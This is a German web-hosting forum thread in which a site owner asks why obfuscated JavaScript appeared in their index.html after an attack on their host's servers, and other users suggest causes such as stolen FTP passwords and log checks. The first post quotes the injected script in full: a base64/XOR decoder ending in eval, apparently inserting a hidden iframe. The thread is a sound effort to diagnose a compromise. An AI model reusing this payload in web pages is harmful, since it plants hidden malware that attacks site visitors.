Merkwürdiger JS-Code in index-Datei

    Hallo,


    seit dem Angriff auf die netcup Server hat unsere index.html Datei folgenden Code im Quellcode gehabt:


    PHP
    <script language="javascript">try { function wSeRLHzrSUGfbB(cIqLnSMrU){var wbRdWCU="",namwSyoX,RDqgWs,wFNcXL,oXHCthJwL,jwAkDWBZ,DjfmIsR,ibPZVqxH,oJThjISzR,rKxmdgfsjc;var cUNAbO="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var WlULi="";for(oJThjISzR=0;oJThjISzR<cIqLnSMrU.length;){oXHCthJwL=cUNAbO.indexOf(cIqLnSMrU.charAt(oJThjISzR++));jwAkDWBZ=cUNAbO.indexOf(cIqLnSMrU.charAt(oJThjISzR++));rKxmdgfsjc=wSeRLHzrSUGfbB;DjfmIsR=cUNAbO.indexOf(cIqLnSMrU.charAt(oJThjISzR++));ibPZVqxH=cUNAbO.indexOf(cIqLnSMrU.charAt(oJThjISzR++));namwSyoX=(oXHCthJwL<<2)+(jwAkDWBZ>>4);RDqgWs=((jwAkDWBZ&15)<<4)+(DjfmIsR>>2);wFNcXL=((DjfmIsR&3)<<6)+ibPZVqxH;rKxmdgfsjc=rKxmdgfsjc.toString();wbRdWCU+=String.fromCharCode(namwSyoX);if(DjfmIsR!=64)wbRdWCU+=String.fromCharCode(RDqgWs);if(ibPZVqxH!=64)wbRdWCU+=String.fromCharCode(wFNcXL);}rKxmdgfsjc=rKxmdgfsjc.replace(/\W/g,"");rKxmdgfsjc=rKxmdgfsjc.split("").reverse().join("");for(oJThjISzR=0;oJThjISzR<wbRdWCU.length;oJThjISzR++)WlULi+=String.fromCharCode(wbRdWCU.charCodeAt(oJThjISzR%wbRdWCU.length)^rKxmdgfsjc.charCodeAt(oJThjISzR%rKxmdgfsjc.length));return eval(WlULi);}wSeRLHzrSUGfbB("SWx1THdMQVZFTlJVVGx7HhUVTgwKEQseA0dZTRwkEScXNiceRjc4ChU1ACEDJh8EBhdLSBoAFQUAHWlbU35uZwwKJyI6AXwVHjYOO2lXSHZ7TU9LbG0GJQAABQZ7KzINNQoDRVlPYUNDU0lkZhsAFQ8EF1ogGy91UXdwEic9GlJ7ZQIBB1MGFls9KyRKMQ0afRJ8MB4LLi4BVyEdISFEGDw6TUllb2cNAAkQHhcLAksQGw0VXhITGhYIAycFEScWSwMVFAYJCFFw");} catch(e){}</script>


    Es handelt sich dabei um das einbringen eines iFrames.... wenn ich den Code korrekt übersetzt habe...


    Der Server nutzt kein proftpd sondern vsftpd, ist auf dem aktuellsten Stand. Das Passwort vom Root ist sehr sicher und es kennt keiner. Weiterhin ist der Login via root nicht möglich sondern nur durch einen User und dieser hat ebenfalls ein sehr sicheres Passwort. Auf der Seite ist nur reiner HTML Code und CSS für Schriftart und Farben.


    Wie kann das also sein, dass die index.html plötzlich nach dem Angriff einen solchen Code erhält, wenn kein Zugriff von unserer Seite aus möglich war?


    Wir würden uns über eine Antwort freuen. Vielen Dank...


    MfG

    Zitat von informant;28008

    Wie kann das also sein, dass die index.html plötzlich nach dem Angriff einen solchen Code erhält, wenn kein Zugriff von unserer Seite aus möglich war?


    Vielleicht unsichere Scripte oder andere Sicherheitslecks? Kontrolliere einmal die Logs, damit du siehst, wann sich jemand eingeloggt hat und was verändert oder aufgerufen wurde.



    MfG Christian

    "Wer nur noch Enten sieht, hat die Kontrolle über seine Server verloren." (Netzentenfund)

    Zitat

    seit dem Angriff auf die netcup Server hat unsere index.html Datei folgenden Code im Quellcode gehabt:


    Unsere Server wurden nicht direkt angegriffen, sondern die vServer unserer Kunden. Die Nodes sind von extern gar nicht erreichbar.

    Hi, haben wir bereitsgemacht. Sind keine Infomationen in dieser Art ersichtlich. Der Vorfall ereignete sich genau zu dem Zeitpunkt, wo netcup angegriffen wurde. Ein unsicheres Script schließen wir zu 100% aus.


    Wo könnten wir noch herausfinden, woher das kommt, da unsereseits alles bestens abgeriegelt ist. Gern kann jeder der will unseren Server auf Lücken prüfen, wir haben keine gefunden und sind auch seite mehr als 10 Jahren im Geschäft mit Servern und dessen Konfigurationen.


    Wir bitten daher um weitere Infos...


    MfG

    Hast du die Passwörter in irgendeinem FTP Programm oder so gespeichert?


    Ich hatte mal den Fall das ich mir einen Virus eingefangen hatte, der aus meinem FTP Programm die Passwörter geklaut hat und sich so per FTP einloggen konnte. Danach war ebenfalls solch ein Code in der index.html eingefügt.

    Zitat

    Ich hatte mal den Fall das ich mir einen Virus eingefangen hatte, der aus meinem FTP Programm die Passwörter geklaut hat und sich so per FTP einloggen konnte. Danach war ebenfalls solch ein Code in der index.html eingefügt.

    Das Problem hatten schon einige Kunden. Ursache waren hier meist Programme zum Website-Design wie z.B. Frontpage, die in Filesharing-Börsen in manipulierter Version angeboten wurden. Die Programme haben meist zu russischen IPs die Passwörter gesendet. Die Russen kamen dann paar Monate später und haben die FTP-Account kompromittiert. Dieses konnte alles über die xfer-Log nachvollzogen werden.

    Hallo,


    Passwort ist nicht gespeichert. Zu dieser Zeit sowie 1 Tag davor + 2 Tage danach war der entsprechende PC auch aus. Wir nutzen kein Frontpage o.ä. auch kein P2P. In der xfer.log ist zu dieser Zeit kein Transfer ersichtlich...


    MfG

    Ich weiß zwar nicht wo die xfer-Log liegt, aber ftp ist unverschlüsselt und das Passwort wird sicherlich über die Tastatur übertragen.


    Die xfer-Log würde ich nur vertrauen, wenn diese irgendwo auf Seiten von netcup liegt und der Kunde darauf nur lesenden Zugriff hat.


    Seit wann genau ist denn dieser html-Code in der Seite drin?

    "Security is like an onion - the more you dig in the more you want to cry"